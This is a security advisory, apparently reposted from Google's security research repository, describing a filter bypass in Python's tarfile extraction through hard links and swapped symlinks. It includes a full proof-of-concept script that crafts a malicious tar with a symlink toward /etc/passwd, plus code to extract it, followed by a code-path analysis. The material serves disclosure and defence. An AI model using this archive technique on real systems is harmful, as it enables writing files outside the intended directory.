Python Tarfile Realpath Overflow Vulnerability
Python's TarFile.extractall() and TarFile.extract() methods support a feature that allows a fi 2025-7-31 00:0:45 Author: github.com(查看原文) 阅读量:0 收藏

Python's TarFile.extractall() and TarFile.extract() methods support a feature that allows a filter to be set to improve the safety of using these methods.

A bug in how links are processed allows for the filter to be bypassed in some limited cases, and allows for objects to be created under directories that differ to their intended location.

The bypass is triggered when a hard link is being created that points to a file that does not exist. The existence of a file can be manipulated by changing a symlink during extraction.

The bypass does not apply to the hard link path validation, but does affect other validation that may occur - such as excluding file types, changing modes, etc.

Severity

Moderate - Should be fixed, but not serious in nature.

1. Create the tar file

In Python run the following code to create a tar file that demonstrates the vulnerability. This tar file will create a symlink that bypasses symlink link destination checking.

import tarfile
with tarfile.open("poc-hardlink-bypass.tar", mode="x:") as tar:
    # Create a deep directory structure so the c/escape symlink stays inside the path
    a = tarfile.TarInfo("a/t/t/t/t/t/t/t/t/t/t/dummy")
    a.size = 0
    a.type = tarfile.REGTYPE
    tar.addfile(a)
    # Create a dummy file that creates the b directory (I am lazy)
    b = tarfile.TarInfo("b/dummy")
    a.size = 0
    a.type = tarfile.REGTYPE
    tar.addfile(b)
    # Point "c" to the bottom of the tree in "a"
    ca = tarfile.TarInfo("c")
    ca.type = tarfile.SYMTYPE
    ca.linkname = "a/t/t/t/t/t/t/t/t/t/t"
    tar.addfile(ca)
    # Create a symlink. At this point the link should point to a non-existant location under "a"
    cescape = tarfile.TarInfo("c/escape")
    cescape.type = tarfile.SYMTYPE
    cescape.linkname = "../../../../../../../../etc/passwd"
    tar.addfile(cescape)
    # Move "c" to point to "b". This means "c/escape" no longer exists.
    cb = tarfile.TarInfo("c")
    cb.type = tarfile.SYMTYPE
    cb.linkname = "b"
    tar.addfile(cb)
    # Attempt to create a hard link to "c/escape". Since it doesn't exist it
    # will basically create "cescape" but at "boom". Which means the directory
    # traversal now escapes the destination path.
    boom = tarfile.TarInfo("boom")
    boom.type = tarfile.LNKTYPE
    boom.linkname = "c/escape"
    tar.addfile(boom)

2. Extract the tar file

Change into a new directory (e.g. mkdir poc; cd poc) and run the following in Python to
decompress the tar created above.

import tarfile
tarfile.open("../poc-hardlink-bypass.tar", mode="r").extractall(".", filter="data")

Further Analysis

When extracting a hard link from a tar archive using extractall() or extract() the function TarFile.makelink() is called.

Before calling os.link() to create a hard link it checks for the existence of the link target by calling os.path.lexist().

If the link target does not exist, rather than creating the link target and then creating the hard link to the link target, the link target is fetched using TarFile._find_link_target() and extracted directly using TarFile._extract_member() at the location of where the hard link would have been created.

This call to TarFile._extract_member() does not pass through the filter method.

This means that by carefully crafting the link target member in the tar file, an attacker can bypass security controls.

TarFile._find_link_target() is challenging to call with a hard link. The search for the link target is restricted to the members that appear before the hard link in the tar file. This means if extractall() is being used the link target member must successfully be extractable. This is not required if extract() is used.

This technique can not be used to create a hard link outside of the destination path. Hard links depend on TarInfo._link_target being present. However this attribute is only set in TarFile._get_extract_tarinfo(), which is not called.

Timeline

Date reported: 2025-05-02
Date fixed:
Date disclosed: 2025-07-31


文章来源: https://github.com/google/security-research/security/advisories/GHSA-7fj8-pjw2-r9vh
如有侵权请联系:admin#unsafe.sh